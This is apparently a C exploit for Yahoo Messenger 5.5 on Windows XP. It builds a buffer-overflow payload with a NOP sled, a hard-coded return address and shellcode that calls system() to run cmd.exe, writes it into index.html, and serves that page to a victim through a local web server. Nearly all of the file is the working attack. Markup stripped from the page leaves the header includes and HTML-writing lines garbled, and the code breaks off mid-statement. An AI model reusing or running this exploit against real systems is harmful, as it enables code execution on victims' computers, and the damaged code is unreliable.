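/*
 * ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---
 *
 * Dtors Security Research (DSR)
 * Code by: Rave
 *
 * The buffer looks like this
 *
 * |-<-<-<--|
 *
 * ^__________^
 *
 */

/* The eight header names were lost when this page was extracted (the
 * angle-bracketed names were treated as markup); the bare directives are
 * kept as found. */
#include
#include
#include
#include
#include /* These are the usual header files */
#include
#include
#include

#define MAXDATASIZE 555 /* Max number of bytes of data */
#define BACKLOG 200     /* Number of allowed connections */

/* Listening port for the local web server; overridden by -P. */
static int port = 80;

/* library entry inside msvcrt.dll to jmp 0xc (EB0C); */
char sraddress[8] = "\x16\xd8\xE8\x77";

/* This shellcode just executes cmd.exe nothing special here..
 * the victim gets a cmd shell on his desktop :) lol !
 */
unsigned char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
    "\x44\x80\xbf\x77" /* 0x78bf8044 <- adress of system() */
    "\xff\xd0";        /* call system() */

/* Print the banner and the command-line help to stdout.
 *
 * programName is accepted for call compatibility but does not appear in
 * the text (the original ignored it as well). */
void Usage(char *programName)
{
    static const char rule[] =
        "\t\t---------------------------------------------------\n";

    (void)programName;

    printf("\n%s", rule);
    printf("\t\t\t\tDtors Security Research (DSR) \n");
    printf("\t\t\t\tCode by: Rave\n");
    printf("\t\t\t\tMail: rave@dtors.net\n");
    printf("%s\n", rule);
    /* Modify here to add your usage message when the program is
     * called without arguments */
    printf("%s\n", rule);
    fprintf(stdout, "\t\t-P local webserver server portnumber\n");
    fprintf(stdout, "\t\t-g greatz to:\n\n\n\n\n");
    printf("%s\n", rule);
}

/* Parse a decimal TCP port from text.
 *
 * Returns 0 and stores the value in *out when text is a whole number in
 * 1..65535; returns -1 and leaves *out untouched otherwise (empty string,
 * trailing junk, or out of range - strtol's saturation on overflow lands
 * outside the range, so no errno check is needed). */
static int ParsePort(const char *text, int *out)
{
    char *end = NULL;
    long value = strtol(text, &end, 10);

    if (end == text || *end != '\0') {
        return -1;
    }
    if (value < 1 || value > 65535) {
        return -1;
    }
    *out = (int)value;
    return 0;
}

/* Scan argv for option switches ("-x" or "/x") and return the index of the
 * first argument that is not an option, or 0 when every argument is one.
 *
 * Switches: -? and -help (any case) print the usage text; -P <n> sets the
 * global port.  Anything else prints "unknown option".
 *
 * Fixes over the original: -P indexed argv[i+1] unconditionally, reading
 * past the end of argv when it was the last argument; the value is now
 * required, consumed (so it is no longer returned as the "first
 * non-option"), and validated instead of silently becoming 0 via atoi. */
int HandleOptions(int argc, char *argv[])
{
    for (int i = 1; i < argc; i++) {
        char *arg = argv[i];

        if (arg[0] != '/' && arg[0] != '-') {
            return i; /* first argument that is not a switch */
        }

        switch (arg[1]) {
        case '?':
            Usage(argv[0]);
            break;

        case 'P':
            if (i + 1 >= argc) {
                fprintf(stderr, "option %s needs a port number\n", arg);
                break;
            }
            i++; /* consume the value so it is not re-parsed as an argument */
            if (ParsePort(argv[i], &port) != 0) {
                fprintf(stderr, "invalid port %s, keeping %d\n", argv[i], port);
            }
            break;

        case 'H':
        case 'h':
            /* -help in any case; a lone -h falls through as unknown. */
            if (stricmp(arg + 1, "help") == 0) {
                Usage(argv[0]);
                break;
            }
            /* fallthrough */
        default:
            fprintf(stderr, "unknown option %s\n", arg);
            break;
        }
    }
    return 0;
}

/* Entry point.  Only the head of main is on this page; it is kept as
 * written and its body continues below. */
int main(int argc, char *argv[])
{
    FILE *fptr;
    unsigned char buffer[5000];
    int offset = 320; // <-- the offset off the buffer = 320 x NOP; (At 321 whe begin the instruction pointer change)
    int fd, fd2, i, numbytes, sin_size; /* files descriptors */
    char sd[MAXDATASIZE];               /* sd will store send text */
    struct sockaddr_in server;          /* server's address information */
    struct sockaddr_in client;          /* client's address information */
    struct hostent *he;                 /* pointer for the host entry */
    WSADATA wsdata;

    WSAStartup(0x0101, &wsdata);

    if (argc == 1) {
        /* If no arguments we call the Usage routine and exit */
        Usage(argv[0]);
        return 1;
    }

    HandleOptions(argc, argv);

    fprintf(stdout, "Creating index.html: ");
    if ((fptr = fopen("index.html", "w")) == NULL) {
        fprintf(stderr, "Failed\n");
        exit(1);
    } else {
        fprintf(stderr, "Done\n");
    }

    // memseting the buffers for preperation
    memset(sd, 0x00, MAXDATASIZE);
    memset(buffer, 0x00, offset + 32 + strlen(shellcode));
    memset(buffer, 0x90, offset);

    // whe place the a jmp ebp+0x3 instuction inside the buffer
    // to jump over the eip changing bytes at the en offset
    //
    // jmp 0x3
    // |____________^
    buffer[offset - 4] = 0xeb;
    buffer[offset - 3] = 0x03;
    memcpy(buffer + offset, sraddress, 4);
    memcpy(buffer + offset + 4, shellcode, strlen(shellcode));

    // here whe make the index.html
    // whe open it again if some one connects to the exploiting server
    // and send it over to the victim.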
fprintf(fptr,"",0x22,0x22); fprintf(fptr,""); fprintf(fptr,"Oohhh my god exploited\n"); fprintf(fptr,"",0x22,0x22); fprintf(fptr,""); fprintf(fptr,"", 0x22,0x22,0x22,0x22,0x22,0x22); fprintf(fptr,"Dtors Security Research (DSR)\n"); fprintf(fptr,"

Yah000 Messager Version 5.5 exploit....

\n"); fprintf(fptr,"
");
fprintf(fptr,"